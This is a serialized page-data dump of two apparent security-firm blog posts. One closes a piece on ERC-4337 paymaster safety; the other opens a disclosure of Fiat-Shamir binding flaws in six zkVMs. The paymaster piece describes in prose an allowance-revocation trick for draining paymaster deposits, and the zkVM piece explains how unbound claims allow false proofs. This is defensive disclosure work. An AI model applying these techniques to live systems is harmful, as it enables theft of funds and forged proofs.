",{"type":25,"tag":82,"props":111627,"children":111629},{"className":111628},[],[111630],{"type":31,"value":108397},{"type":31,"value":111632}," while maximizing the gas costs they can charge to the paymaster.",{"type":25,"tag":38,"props":111634,"children":111635},{},[111636,111638,111643,111645,111650,111652,111658,111660,111665],{"type":31,"value":111637},"Some paymasters try to protect against this by simulating the ",{"type":25,"tag":82,"props":111639,"children":111641},{"className":111640},[],[111642],{"type":31,"value":106140},{"type":31,"value":111644}," execution before signing and allowing it to be submitted. However, this protection can be easily bypassed because an attacker can simply approve the required token allowance during simulation to pass validation, but then revoke the allowance just before the ",{"type":25,"tag":82,"props":111646,"children":111648},{"className":111647},[],[111649],{"type":31,"value":106140},{"type":31,"value":111651}," is submitted via ",{"type":25,"tag":82,"props":111653,"children":111655},{"className":111654},[],[111656],{"type":31,"value":111657},"handleOps",{"type":31,"value":111659},". This means the ",{"type":25,"tag":82,"props":111661,"children":111663},{"className":111662},[],[111664],{"type":31,"value":108397},{"type":31,"value":111666}," will pass simulation but fail during actual execution, allowing the bundler to drain the paymaster's deposit from the EntryPoint.",{"type":25,"tag":38,"props":111668,"children":111669},{},[111670],{"type":31,"value":111671},"To protect against this vulnerability, paymasters should implement pre-execution charging patterns rather than post-execution charging. This means requiring users to pre-fund the full estimated gas cost during the validation phase, before the operation executes. By collecting payment upfront, the paymaster is protected against failed post-execution transfers that could be exploited by malicious bundlers.",{"type":25,"tag":38,"props":111673,"children":111674},{},[111675],{"type":31,"value":111676},"If post-execution charging is absolutely necessary for UX reasons, paymasters have several mitigation strategies available. One approach is to restrict usage to a whitelist of trusted bundlers, though this introduces centralization concerns. Alternatively, Pimlico tries to address this issue by tightening API limits and constraining ERC-20 usage for its users.",{"type":25,"tag":38,"props":111678,"children":111679},{},[111680],{"type":31,"value":111681},"The most secure approach is to require upfront pre-funding, even though it may temporarily lock more user funds. This small UX tradeoff is worth the strong security guarantees it provides against paymaster exploitation.",{"type":25,"tag":453,"props":111683,"children":111684},{"id":32892},[111685],{"type":31,"value":22907},{"type":25,"tag":38,"props":111687,"children":111688},{},[111689],{"type":31,"value":111690},"ERC-4337 paymasters enable powerful new UX patterns by abstracting away gas costs from end users. However, implementing them securely requires careful consideration of the standard's execution flow and potential attack vectors. The key lessons are:",{"type":25,"tag":6711,"props":111692,"children":111693},{},[111694,111699,111704,111709,111714],{"type":25,"tag":2043,"props":111695,"children":111696},{},[111697],{"type":31,"value":111698},"Always collect full payment during validation, not after execution",{"type":25,"tag":2043,"props":111700,"children":111701},{},[111702],{"type":31,"value":111703},"Be conservative with gas estimations and include safety margins",{"type":25,"tag":2043,"props":111705,"children":111706},{},[111707],{"type":31,"value":111708},"Carefully validate all user inputs and token transfers",{"type":25,"tag":2043,"props":111710,"children":111711},{},[111712],{"type":31,"value":111713},"Test extensively, including simulation of malicious behavior",{"type":25,"tag":2043,"props":111715,"children":111716},{},[111717,111719,111724],{"type":31,"value":111718},"Always review changes in new ",{"type":25,"tag":82,"props":111720,"children":111722},{"className":111721},[],[111723],{"type":31,"value":106221},{"type":31,"value":111725}," versions, as they may impact your paymaster's design and security assumptions",{"type":25,"tag":38,"props":111727,"children":111728},{},[111729,111731,111736,111738,111743,111745,111750],{"type":31,"value":111730},"The last point is particularly important as the ERC-4337 standard continues to evolve. Changes to the ",{"type":25,"tag":82,"props":111732,"children":111734},{"className":111733},[],[111735],{"type":31,"value":106221},{"type":31,"value":111737}," contract's behavior could potentially break existing ",{"type":25,"tag":82,"props":111739,"children":111741},{"className":111740},[],[111742],{"type":31,"value":106293},{"type":31,"value":111744}," implementations or introduce new security considerations. Developers should thoroughly review release notes and diffs when upgrading to new ",{"type":25,"tag":82,"props":111746,"children":111748},{"className":111747},[],[111749],{"type":31,"value":106221},{"type":31,"value":111751}," versions.",{"type":25,"tag":38,"props":111753,"children":111754},{},[111755],{"type":31,"value":111756},"By following these best practices, developers can build robust paymasters that enhance UX while protecting against exploitation. As the ERC-4337 ecosystem matures, secure paymaster implementations will be crucial for driving mainstream adoption of account abstraction.",{"type":25,"tag":38,"props":111758,"children":111759},{},[111760],{"type":31,"value":111761},"If you're building a paymaster and want to ensure it's secure against these and other vulnerabilities, consider getting an audit from us. Our team has extensive experience auditing ERC-4337 implementations and can help identify potential security issues before they impact production.",{"type":25,"tag":9316,"props":111763,"children":111764},{},[111765],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":111767},[111768,111769,111770,111777,111782,111783],{"id":106055,"depth":6769,"text":106058},{"id":106071,"depth":6769,"text":106074},{"id":106110,"depth":6769,"text":106113,"children":111771},[111772,111773,111774,111775,111776],{"id":106133,"depth":6778,"text":106140},{"id":106174,"depth":6778,"text":106177},{"id":106200,"depth":6778,"text":106203},{"id":18680,"depth":6778,"text":106221},{"id":106293,"depth":6778,"text":106304},{"id":106356,"depth":6769,"text":111778,"children":111779},"Understanding the EntryPoint's Flow",[111780,111781],{"id":106412,"depth":6778,"text":106415},{"id":106597,"depth":6778,"text":106600},{"id":106840,"depth":6769,"text":106846},{"id":108440,"depth":6769,"text":108446,"children":111784},[111785,111786],{"id":108500,"depth":6778,"text":108503},{"id":108560,"depth":6778,"text":108563},"content:blog:2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm.md","blog/2025-12-02-paymasters-evm",{"_path":111791,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":111792,"description":111793,"date":111794,"author":111795,"image":111798,"isFeatured":16,"onBlogPage":16,"tags":111800,"body":111802,"_type":6798,"_id":127581,"_source":6800,"_file":127582,"_stem":127583,"_extension":6803},"/blog/2026-03-03-zkvms-unfaithful-claims","Unfaithful Claims: Breaking 6 zkVMs","A zkVM verifier should be faithful to one thing above all else: its public claims. Yet we found six systems where this guarantee breaks. Learn how a subtle ordering bug lets an attacker bypass the cryptography entirely and prove mathematically impossible statements.","2026-03-03T12:00:00.000Z",[111796,111797],"himanshu","valter",{"src":111799,"width":101226,"height":17580},"/posts/zkvms-unfaithful-claims/title.png",[111801],"zkVM",{"type":22,"children":111803,"toc":127545},[111804,111809,111851,111864,111867,111873,111878,112006,112009,112015,112021,112026,112058,112206,112211,112334,112345,112356,112379,112390,112395,112428,112436,112441,112444,112450,112455,112461,112466,112471,112479,112497,112638,112643,112649,112741,113469,113537,113548,113556,114028,114034,114472,114812,114964,114969,115855,116011,116017,116109,116114,116697,117147,117223,117229,117234,117303,117313,117329,117339,117400,117813,117845,117855,118030,118035,118045,118645,118833,118851,118854,118860,118865,118873,118905,119266,119271,119356,119359,119365,119373,119378,119381,119387,119392,119400,119408,119416,119424,119457,119465,119473,119564,119815,120142,120150,120180,120350,120676,120681,120686,120703,120706,120711,120716,120728,120740,121331,121343,121355,121362,121370,121382,121390,121405,121410,121690,121709,121804,121823,121839,121842,121848,121853,121858,121865,121873,121880,121888,121901,121919,122379,122481,122486,122491,122507,122510,122516,122521,122533,122544,122549,122939,122946,122954,122979,122999,123255,123266,123285,123669,124015,124245,124404,124564,125132,125137,125163,125166,125172,125177,125184,125192,125205,125277,125288,125296,125306,125314,125325,125599,125688,125717,125720,125725,125858,125870,125877,125882,126035,126061,126068,126076,126081,126147,126152,126541,126628,126644,126647,126653,126658,126664,126762,126821,126826,126832,126837,126845,126850,126856,126861,126866,126872,126877,126880,126886,126892,126897,126902,126907,126912,126917,126920,126926,127089,127094,127097,127102,127113,127430,127435,127459,127464,127482,127487,127490,127496,127501,127506,127516,127521,127531,127541],{"type":25,"tag":38,"props":111805,"children":111806},{},[111807],{"type":31,"value":111808},"A zkVM verifier should be faithful to one thing above all else: its public claims. If the claimed input/output statement is false, verification must fail.",{"type":25,"tag":38,"props":111810,"children":111811},{},[111812,111814,111819,111820,111825,111826,111831,111832,111837,111838,111843,111844,111849],{"type":31,"value":111813},"We found six systems where this faithfulness breaks. Across ",{"type":25,"tag":9273,"props":111815,"children":111816},{},[111817],{"type":31,"value":111818},"Jolt",{"type":31,"value":7026},{"type":25,"tag":9273,"props":111821,"children":111822},{},[111823],{"type":31,"value":111824},"Nexus",{"type":31,"value":7026},{"type":25,"tag":9273,"props":111827,"children":111828},{},[111829],{"type":31,"value":111830},"Cairo-M",{"type":31,"value":7026},{"type":25,"tag":9273,"props":111833,"children":111834},{},[111835],{"type":31,"value":111836},"Ceno",{"type":31,"value":7026},{"type":25,"tag":9273,"props":111839,"children":111840},{},[111841],{"type":31,"value":111842},"Expander",{"type":31,"value":10439},{"type":25,"tag":9273,"props":111845,"children":111846},{},[111847],{"type":31,"value":111848},"Binius64",{"type":31,"value":111850},", public-claim data was not always bound into Fiat-Shamir transcripts before challenge generation. That subtle ordering bug turns statement values into attacker-controlled variables in later verification equations.",{"type":25,"tag":38,"props":111852,"children":111853},{},[111854,111856,111862],{"type":31,"value":111855},"In this post, we demonstrate how to exploit these unbound variables to bypass the cryptography entirely and prove mathematically impossible statements, such as finding a counterexample to Fermat's Last Theorem (see ",{"type":25,"tag":162,"props":111857,"children":111859},{"href":111858},"#challenges",[111860],{"type":31,"value":111861},"Challenges",{"type":31,"value":111863}," to try this out yourself). In a blockchain context, this could translate to receiving $1M out of thin air.",{"type":25,"tag":22753,"props":111865,"children":111866},{},[],{"type":25,"tag":26,"props":111868,"children":111870},{"id":111869},"jargon-cheat-sheet",[111871],{"type":31,"value":111872},"Jargon Cheat Sheet",{"type":25,"tag":38,"props":111874,"children":111875},{},[111876],{"type":31,"value":111877},"Before we go deeper, here's a one-liner for every term you'll encounter. The ZK ecosystem is particularly full of jargon and abbreviations, which may be off-putting to newcomers. Bookmark this section.",{"type":25,"tag":2039,"props":111879,"children":111880},{},[111881,111891,111901,111911,111921,111931,111941,111951,111961,111971,111981,111991],{"type":25,"tag":2043,"props":111882,"children":111883},{},[111884,111889],{"type":25,"tag":9273,"props":111885,"children":111886},{},[111887],{"type":31,"value":111888},"Fiat-Shamir",{"type":31,"value":111890},": Instead of a real verifier sending random challenges, hash everything so far to get \"random\" challenges. Makes proofs non-interactive.",{"type":25,"tag":2043,"props":111892,"children":111893},{},[111894,111899],{"type":25,"tag":9273,"props":111895,"children":111896},{},[111897],{"type":31,"value":111898},"Transcript",{"type":31,"value":111900},": The running hash state. You \"absorb\" data into it, then \"squeeze\" out challenges.",{"type":25,"tag":2043,"props":111902,"children":111903},{},[111904,111909],{"type":25,"tag":9273,"props":111905,"children":111906},{},[111907],{"type":31,"value":111908},"Polynomial Commitment",{"type":31,"value":111910},": Like a hash, but for polynomials. You commit to a polynomial, then later prove \"my polynomial evaluates to 42 at point 7\" without revealing the whole polynomial.",{"type":25,"tag":2043,"props":111912,"children":111913},{},[111914,111919],{"type":25,"tag":9273,"props":111915,"children":111916},{},[111917],{"type":31,"value":111918},"Sumcheck",{"type":31,"value":111920},": A protocol to prove \"this polynomial sums to H over all boolean inputs\" without actually computing the exponentially many terms. Reduces to checking one random point.",{"type":25,"tag":2043,"props":111922,"children":111923},{},[111924,111929],{"type":25,"tag":9273,"props":111925,"children":111926},{},[111927],{"type":31,"value":111928},"MLE (Multilinear Extension)",{"type":31,"value":111930},": Turn a table of values into a polynomial. The polynomial equals the table on 0/1 inputs and smoothly interpolates elsewhere. Key property: evaluating it is a linear function of the table entries.",{"type":25,"tag":2043,"props":111932,"children":111933},{},[111934,111939],{"type":25,"tag":9273,"props":111935,"children":111936},{},[111937],{"type":31,"value":111938},"Lookup / LogUp",{"type":31,"value":111940},": Prove \"all my values appear in this table\" by encoding membership as sums of fractions. If the sums match, the sets match (with high probability).",{"type":25,"tag":2043,"props":111942,"children":111943},{},[111944,111949],{"type":25,"tag":9273,"props":111945,"children":111946},{},[111947],{"type":31,"value":111948},"AIR",{"type":31,"value":111950},": \"Algebraic Intermediate Representation\" - a way to write \"valid execution trace\" as polynomial equations. If the equations hold, the trace is valid.",{"type":25,"tag":2043,"props":111952,"children":111953},{},[111954,111959],{"type":25,"tag":9273,"props":111955,"children":111956},{},[111957],{"type":31,"value":111958},"STARK",{"type":31,"value":111960},": Prove AIR constraints hold using commitments + random sampling + FRI. No trusted setup needed.",{"type":25,"tag":2043,"props":111962,"children":111963},{},[111964,111969],{"type":25,"tag":9273,"props":111965,"children":111966},{},[111967],{"type":31,"value":111968},"FRI",{"type":31,"value":111970},": \"Fast Reed-Solomon IOP\" - proves a committed function is actually a low-degree polynomial, not arbitrary garbage that passes spot-checks.",{"type":25,"tag":2043,"props":111972,"children":111973},{},[111974,111979],{"type":25,"tag":9273,"props":111975,"children":111976},{},[111977],{"type":31,"value":111978},"OODS",{"type":31,"value":111980},": \"Out-of-Domain Sampling\" - check the constraint polynomial at a random point outside the execution domain. Ties everything together.",{"type":25,"tag":2043,"props":111982,"children":111983},{},[111984,111989],{"type":25,"tag":9273,"props":111985,"children":111986},{},[111987],{"type":31,"value":111988},"GKR",{"type":31,"value":111990},": Verify arithmetic circuits layer-by-layer using sumcheck. Reduces \"check this huge circuit\" to \"check a few random evaluations.\"",{"type":25,"tag":2043,"props":111992,"children":111993},{},[111994,111999,112001],{"type":25,"tag":9273,"props":111995,"children":111996},{},[111997],{"type":31,"value":111998},"claimed_sum / opening_claim",{"type":31,"value":112000},": Prover-supplied values that feed into verification equations. ",{"type":25,"tag":9273,"props":112002,"children":112003},{},[112004],{"type":31,"value":112005},"These are the usual suspects for binding bugs.",{"type":25,"tag":22753,"props":112007,"children":112008},{},[],{"type":25,"tag":26,"props":112010,"children":112012},{"id":112011},"what-are-we-even-breaking",[112013],{"type":31,"value":112014},"What Are We Even Breaking?",{"type":25,"tag":606,"props":112016,"children":112018},{"id":112017},"what-is-a-zkvm",[112019],{"type":31,"value":112020},"What is a zkVM?",{"type":25,"tag":38,"props":112022,"children":112023},{},[112024],{"type":31,"value":112025},"A zkVM proof claims that a program executed correctly on public inputs, producing the claimed public output, while hiding the full execution trace.",{"type":25,"tag":38,"props":112027,"children":112028},{},[112029,112031,112056],{"type":31,"value":112030},"Formally, the verifier is convinced that there exists a valid trace ",{"type":25,"tag":82,"props":112032,"children":112034},{"className":112033},[212,4702],[112035],{"type":25,"tag":216,"props":112036,"children":112038},{"className":112037},[224],[112039],{"type":25,"tag":216,"props":112040,"children":112042},{"className":112041,"ariaHidden":230},[229],[112043],{"type":25,"tag":216,"props":112044,"children":112046},{"className":112045},[235],[112047,112051],{"type":25,"tag":216,"props":112048,"children":112050},{"className":112049,"style":4799},[240],[],{"type":25,"tag":216,"props":112052,"children":112054},{"className":112053,"style":2152},[246,2151],[112055],{"type":31,"value":177},{"type":31,"value":112057}," such that:",{"type":25,"tag":38,"props":112059,"children":112060},{},[112061],{"type":25,"tag":82,"props":112062,"children":112064},{"className":112063},[212,4702],[112065],{"type":25,"tag":216,"props":112066,"children":112068},{"className":112067},[224],[112069],{"type":25,"tag":216,"props":112070,"children":112072},{"className":112071,"ariaHidden":230},[229],[112073,112117,112192],{"type":25,"tag":216,"props":112074,"children":112076},{"className":112075},[235],[112077,112081,112087,112091,112096,112100,112104,112109,112113],{"type":25,"tag":216,"props":112078,"children":112080},{"className":112079,"style":96933},[240],[],{"type":25,"tag":216,"props":112082,"children":112084},{"className":112083},[246],[112085],{"type":31,"value":112086},"∃",{"type":25,"tag":216,"props":112088,"children":112090},{"className":112089,"style":258},[257],[],{"type":25,"tag":216,"props":112092,"children":112094},{"className":112093,"style":2152},[246,2151],[112095],{"type":31,"value":177},{"type":25,"tag":216,"props":112097,"children":112099},{"className":112098,"style":258},[257],[],{"type":25,"tag":216,"props":112101,"children":112103},{"className":112102,"style":258},[257],[],{"type":25,"tag":216,"props":112105,"children":112107},{"className":112106},[263],[112108],{"type":31,"value":1472},{"type":25,"tag":216,"props":112110,"children":112112},{"className":112111,"style":258},[257],[],{"type":25,"tag":216,"props":112114,"children":112116},{"className":112115,"style":258},[257],[],{"type":25,"tag":216,"props":112118,"children":112120},{"className":112119},[235],[112121,112125,112136,112141,112146,112151,112155,112160,112165,112169,112174,112179,112183,112188],{"type":25,"tag":216,"props":112122,"children":112124},{"className":112123,"style":5513},[240],[],{"type":25,"tag":216,"props":112126,"children":112128},{"className":112127},[246],[112129],{"type":25,"tag":216,"props":112130,"children":112133},{"className":112131},[246,112132],"mathsf",[112134],{"type":31,"value":112135},"VM",{"type":25,"tag":216,"props":112137,"children":112139},{"className":112138},[287],[112140],{"type":31,"value":1850},{"type":25,"tag":216,"props":112142,"children":112144},{"className":112143,"style":2152},[246,2151],[112145],{"type":31,"value":2155},{"type":25,"tag":216,"props":112147,"children":112149},{"className":112148},[1864],[112150],{"type":31,"value":1867},{"type":25,"tag":216,"props":112152,"children":112154},{"className":112153,"style":1871},[257],[],{"type":25,"tag":216,"props":112156,"children":112158},{"className":112157,"style":2229},[246,2151],[112159],{"type":31,"value":10084},{"type":25,"tag":216,"props":112161,"children":112163},{"className":112162},[1864],[112164],{"type":31,"value":1867},{"type":25,"tag":216,"props":112166,"children":112168},{"className":112167,"style":1871},[257],[],{"type":25,"tag":216,"props":112170,"children":112172},{"className":112171,"style":2152},[246,2151],[112173],{"type":31,"value":177},{"type":25,"tag":216,"props":112175,"children":112177},{"className":112176},[427],[112178],{"type":31,"value":1888},{"type":25,"tag":216,"props":112180,"children":112182},{"className":112181,"style":258},[257],[],{"type":25,"tag":216,"props":112184,"children":112186},{"className":112185},[263],[112187],{"type":31,"value":26279},{"type":25,"tag":216,"props":112189,"children":112191},{"className":112190,"style":258},[257],[],{"type":25,"tag":216,"props":112193,"children":112195},{"className":112194},[235],[112196,112200],{"type":25,"tag":216,"props":112197,"children":112199},{"className":112198,"style":4799},[240],[],{"type":25,"tag":216,"props":112201,"children":112204},{"className":112202,"style":112203},[246,2151],"margin-right:0.22222em;",[112205],{"type":31,"value":10114},{"type":25,"tag":38,"props":112207,"children":112208},{},[112209],{"type":31,"value":112210},"where:",{"type":25,"tag":2039,"props":112212,"children":112213},{},[112214,112244,112274,112304],{"type":25,"tag":2043,"props":112215,"children":112216},{},[112217,112242],{"type":25,"tag":82,"props":112218,"children":112220},{"className":112219},[212,4702],[112221],{"type":25,"tag":216,"props":112222,"children":112224},{"className":112223},[224],[112225],{"type":25,"tag":216,"props":112226,"children":112228},{"className":112227,"ariaHidden":230},[229],[112229],{"type":25,"tag":216,"props":112230,"children":112232},{"className":112231},[235],[112233,112237],{"type":25,"tag":216,"props":112234,"children":112236},{"className":112235,"style":4799},[240],[],{"type":25,"tag":216,"props":112238,"children":112240},{"className":112239,"style":2152},[246,2151],[112241],{"type":31,"value":2155},{"type":31,"value":112243}," = program/circuit description (public)",{"type":25,"tag":2043,"props":112245,"children":112246},{},[112247,112272],{"type":25,"tag":82,"props":112248,"children":112250},{"className":112249},[212,4702],[112251],{"type":25,"tag":216,"props":112252,"children":112254},{"className":112253},[224],[112255],{"type":25,"tag":216,"props":112256,"children":112258},{"className":112257,"ariaHidden":230},[229],[112259],{"type":25,"tag":216,"props":112260,"children":112262},{"className":112261},[235],[112263,112267],{"type":25,"tag":216,"props":112264,"children":112266},{"className":112265,"style":4799},[240],[],{"type":25,"tag":216,"props":112268,"children":112270},{"className":112269,"style":2229},[246,2151],[112271],{"type":31,"value":10084},{"type":31,"value":112273}," = public input",{"type":25,"tag":2043,"props":112275,"children":112276},{},[112277,112302],{"type":25,"tag":82,"props":112278,"children":112280},{"className":112279},[212,4702],[112281],{"type":25,"tag":216,"props":112282,"children":112284},{"className":112283},[224],[112285],{"type":25,"tag":216,"props":112286,"children":112288},{"className":112287,"ariaHidden":230},[229],[112289],{"type":25,"tag":216,"props":112290,"children":112292},{"className":112291},[235],[112293,112297],{"type":25,"tag":216,"props":112294,"children":112296},{"className":112295,"style":4799},[240],[],{"type":25,"tag":216,"props":112298,"children":112300},{"className":112299,"style":112203},[246,2151],[112301],{"type":31,"value":10114},{"type":31,"value":112303}," = claimed public output",{"type":25,"tag":2043,"props":112305,"children":112306},{},[112307,112332],{"type":25,"tag":82,"props":112308,"children":112310},{"className":112309},[212,4702],[112311],{"type":25,"tag":216,"props":112312,"children":112314},{"className":112313},[224],[112315],{"type":25,"tag":216,"props":112316,"children":112318},{"className":112317,"ariaHidden":230},[229],[112319],{"type":25,"tag":216,"props":112320,"children":112322},{"className":112321},[235],[112323,112327],{"type":25,"tag":216,"props":112324,"children":112326},{"className":112325,"style":4799},[240],[],{"type":25,"tag":216,"props":112328,"children":112330},{"className":112329,"style":2152},[246,2151],[112331],{"type":31,"value":177},{"type":31,"value":112333}," = private witness/trace (registers, memory history, intermediate values)",{"type":25,"tag":38,"props":112335,"children":112336},{},[112337,112339,112343],{"type":31,"value":112338},"The verifier does ",{"type":25,"tag":9273,"props":112340,"children":112341},{},[112342],{"type":31,"value":22448},{"type":31,"value":112344}," replay execution step by step. Instead, it checks algebraic constraints over committed polynomials.",{"type":25,"tag":38,"props":112346,"children":112347},{},[112348,112350,112355],{"type":31,"value":112349},"Some systems in this post are verifiable-computing systems rather than full zero-knowledge systems, but the critical property is still ",{"type":25,"tag":9273,"props":112351,"children":112352},{},[112353],{"type":31,"value":112354},"soundness",{"type":31,"value":1472},{"type":25,"tag":2039,"props":112357,"children":112358},{},[112359,112369],{"type":25,"tag":2043,"props":112360,"children":112361},{},[112362,112367],{"type":25,"tag":9273,"props":112363,"children":112364},{},[112365],{"type":31,"value":112366},"Completeness",{"type":31,"value":112368},": honest execution verifies.",{"type":25,"tag":2043,"props":112370,"children":112371},{},[112372,112377],{"type":25,"tag":9273,"props":112373,"children":112374},{},[112375],{"type":31,"value":112376},"Soundness",{"type":31,"value":112378},": false execution should not verify.",{"type":25,"tag":38,"props":112380,"children":112381},{},[112382,112384,112388],{"type":31,"value":112383},"We are breaking ",{"type":25,"tag":9273,"props":112385,"children":112386},{},[112387],{"type":31,"value":112354},{"type":31,"value":112389}," in all six systems.",{"type":25,"tag":38,"props":112391,"children":112392},{},[112393],{"type":31,"value":112394},"In all six codebases, verification follows this abstract flow:",{"type":25,"tag":6711,"props":112396,"children":112397},{},[112398,112403,112408,112413,112418,112423],{"type":25,"tag":2043,"props":112399,"children":112400},{},[112401],{"type":31,"value":112402},"Fix public statement data.",{"type":25,"tag":2043,"props":112404,"children":112405},{},[112406],{"type":31,"value":112407},"Parse proof payload (commitments, reduction messages, openings).",{"type":25,"tag":2043,"props":112409,"children":112410},{},[112411],{"type":31,"value":112412},"Rebuild Fiat-Shamir challenges from transcript state.",{"type":25,"tag":2043,"props":112414,"children":112415},{},[112416],{"type":31,"value":112417},"Check constraint equations at sampled points.",{"type":25,"tag":2043,"props":112419,"children":112420},{},[112421],{"type":31,"value":112422},"Check PCS/opening consistency.",{"type":25,"tag":2043,"props":112424,"children":112425},{},[112426],{"type":31,"value":112427},"Accept only if all checks are jointly consistent.",{"type":25,"tag":38,"props":112429,"children":112430},{},[112431],{"type":25,"tag":6467,"props":112432,"children":112435},{"alt":112433,"src":112434},"1_prover_verifier","/posts/zkvms-unfaithful-claims/1_prover_verifier.svg",[],{"type":25,"tag":38,"props":112437,"children":112438},{},[112439],{"type":31,"value":112440},"The non-negotiable invariant is transcript ordering: if a value affects a verifier equation, it must be absorbed before sampling the challenge that gates that equation. Violating this gives the prover an attacker-controlled degree of freedom.",{"type":25,"tag":22753,"props":112442,"children":112443},{},[],{"type":25,"tag":26,"props":112445,"children":112447},{"id":112446},"the-building-blocks",[112448],{"type":31,"value":112449},"The Building Blocks",{"type":25,"tag":38,"props":112451,"children":112452},{},[112453],{"type":31,"value":112454},"Before we can understand the bugs, we need to understand the protocols they break. Each of these is a tool that zkVMs compose together.",{"type":25,"tag":606,"props":112456,"children":112458},{"id":112457},"the-fiat-shamir-transform",[112459],{"type":31,"value":112460},"The Fiat-Shamir Transform",{"type":25,"tag":38,"props":112462,"children":112463},{},[112464],{"type":31,"value":112465},"Interactive protocols (the type most commonly described in literature) require real-time communication. It involves the verifier sending random challenges, and the prover responding to them. This doesn't work for blockchains (where you have no real-time verifier) or when you want anyone to verify your proof at a later point.",{"type":25,"tag":38,"props":112467,"children":112468},{},[112469],{"type":31,"value":112470},"The solution is to replace the verifier's randomness with a hash function. The prover \"talks to themselves,\" using the hash of everything so far as the challenge. If we use a cryptographic hash function, this should mean that the challenges are completely unpredictable.",{"type":25,"tag":38,"props":112472,"children":112473},{},[112474],{"type":25,"tag":6467,"props":112475,"children":112478},{"alt":112476,"src":112477},"fiat_shamir2","/posts/zkvms-unfaithful-claims/fiat_shamir2.svg",[],{"type":25,"tag":38,"props":112480,"children":112481},{},[112482,112484,112488,112490,112495],{"type":31,"value":112483},"The hash (transcript) ",{"type":25,"tag":9273,"props":112485,"children":112486},{},[112487],{"type":31,"value":10471},{"type":31,"value":112489}," include everything that affects verification ",{"type":25,"tag":9273,"props":112491,"children":112492},{},[112493],{"type":31,"value":112494},"BEFORE",{"type":31,"value":112496}," the challenges derived from it are used.",{"type":25,"tag":38,"props":112498,"children":112499},{},[112500,112502,112528,112530,112555,112557,112582,112584,112609,112611,112636],{"type":31,"value":112501},"If some value ",{"type":25,"tag":82,"props":112503,"children":112505},{"className":112504},[212,4702],[112506],{"type":25,"tag":216,"props":112507,"children":112509},{"className":112508},[224],[112510],{"type":25,"tag":216,"props":112511,"children":112513},{"className":112512,"ariaHidden":230},[229],[112514],{"type":25,"tag":216,"props":112515,"children":112517},{"className":112516},[235],[112518,112522],{"type":25,"tag":216,"props":112519,"children":112521},{"className":112520,"style":4799},[240],[],{"type":25,"tag":216,"props":112523,"children":112525},{"className":112524,"style":112203},[246,2151],[112526],{"type":31,"value":112527},"V",{"type":31,"value":112529}," affects a verification equation, but ",{"type":25,"tag":82,"props":112531,"children":112533},{"className":112532},[212,4702],[112534],{"type":25,"tag":216,"props":112535,"children":112537},{"className":112536},[224],[112538],{"type":25,"tag":216,"props":112539,"children":112541},{"className":112540,"ariaHidden":230},[229],[112542],{"type":25,"tag":216,"props":112543,"children":112545},{"className":112544},[235],[112546,112550],{"type":25,"tag":216,"props":112547,"children":112549},{"className":112548,"style":4799},[240],[],{"type":25,"tag":216,"props":112551,"children":112553},{"className":112552,"style":112203},[246,2151],[112554],{"type":31,"value":112527},{"type":31,"value":112556}," isn't absorbed before the relevant challenge is squeezed, then the challenge is completely independent of ",{"type":25,"tag":82,"props":112558,"children":112560},{"className":112559},[212,4702],[112561],{"type":25,"tag":216,"props":112562,"children":112564},{"className":112563},[224],[112565],{"type":25,"tag":216,"props":112566,"children":112568},{"className":112567,"ariaHidden":230},[229],[112569],{"type":25,"tag":216,"props":112570,"children":112572},{"className":112571},[235],[112573,112577],{"type":25,"tag":216,"props":112574,"children":112576},{"className":112575,"style":4799},[240],[],{"type":25,"tag":216,"props":112578,"children":112580},{"className":112579,"style":112203},[246,2151],[112581],{"type":31,"value":112527},{"type":31,"value":112583},". This means that the prover can \"see\" (compute in advance) the challenge before choosing ",{"type":25,"tag":82,"props":112585,"children":112587},{"className":112586},[212,4702],[112588],{"type":25,"tag":216,"props":112589,"children":112591},{"className":112590},[224],[112592],{"type":25,"tag":216,"props":112593,"children":112595},{"className":112594,"ariaHidden":230},[229],[112596],{"type":25,"tag":216,"props":112597,"children":112599},{"className":112598},[235],[112600,112604],{"type":25,"tag":216,"props":112601,"children":112603},{"className":112602,"style":4799},[240],[],{"type":25,"tag":216,"props":112605,"children":112607},{"className":112606,"style":112203},[246,2151],[112608],{"type":31,"value":112527},{"type":31,"value":112610},", which may allow it to choose ",{"type":25,"tag":82,"props":112612,"children":112614},{"className":112613},[212,4702],[112615],{"type":25,"tag":216,"props":112616,"children":112618},{"className":112617},[224],[112619],{"type":25,"tag":216,"props":112620,"children":112622},{"className":112621,"ariaHidden":230},[229],[112623],{"type":25,"tag":216,"props":112624,"children":112626},{"className":112625},[235],[112627,112631],{"type":25,"tag":216,"props":112628,"children":112630},{"className":112629,"style":4799},[240],[],{"type":25,"tag":216,"props":112632,"children":112634},{"className":112633,"style":112203},[246,2151],[112635],{"type":31,"value":112527},{"type":31,"value":112637}," exactly so that the verification passes, even though it should not.",{"type":25,"tag":38,"props":112639,"children":112640},{},[112641],{"type":31,"value":112642},"This is the bug class we found in all six systems.",{"type":25,"tag":606,"props":112644,"children":112646},{"id":112645},"the-sumcheck-protocol",[112647],{"type":31,"value":112648},"The Sumcheck Protocol",{"type":25,"tag":38,"props":112650,"children":112651},{},[112652,112654,112739],{"type":31,"value":112653},"The sumcheck protocol proves that a polynomial sums to a claimed value over the Boolean hypercube (all inputs in ",{"type":25,"tag":82,"props":112655,"children":112657},{"className":112656},[212,4702],[112658],{"type":25,"tag":216,"props":112659,"children":112661},{"className":112660},[224],[112662],{"type":25,"tag":216,"props":112663,"children":112665},{"className":112664,"ariaHidden":230},[229],[112666],{"type":25,"tag":216,"props":112667,"children":112669},{"className":112668},[235],[112670,112674,112679,112684,112689,112693,112698],{"type":25,"tag":216,"props":112671,"children":112673},{"className":112672,"style":5513},[240],[],{"type":25,"tag":216,"props":112675,"children":112677},{"className":112676},[287],[112678],{"type":31,"value":80590},{"type":25,"tag":216,"props":112680,"children":112682},{"className":112681},[246],[112683],{"type":31,"value":1882},{"type":25,"tag":216,"props":112685,"children":112687},{"className":112686},[1864],[112688],{"type":31,"value":1867},{"type":25,"tag":216,"props":112690,"children":112692},{"className":112691,"style":1871},[257],[],{"type":25,"tag":216,"props":112694,"children":112696},{"className":112695},[246],[112697],{"type":31,"value":184},{"type":25,"tag":216,"props":112699,"children":112701},{"className":112700},[427],[112702,112707],{"type":25,"tag":216,"props":112703,"children":112705},{"className":112704},[427],[112706],{"type":31,"value":38103},{"type":25,"tag":216,"props":112708,"children":112710},{"className":112709},[2159],[112711],{"type":25,"tag":216,"props":112712,"children":112714},{"className":112713},[298],[112715],{"type":25,"tag":216,"props":112716,"children":112718},{"className":112717},[304],[112719],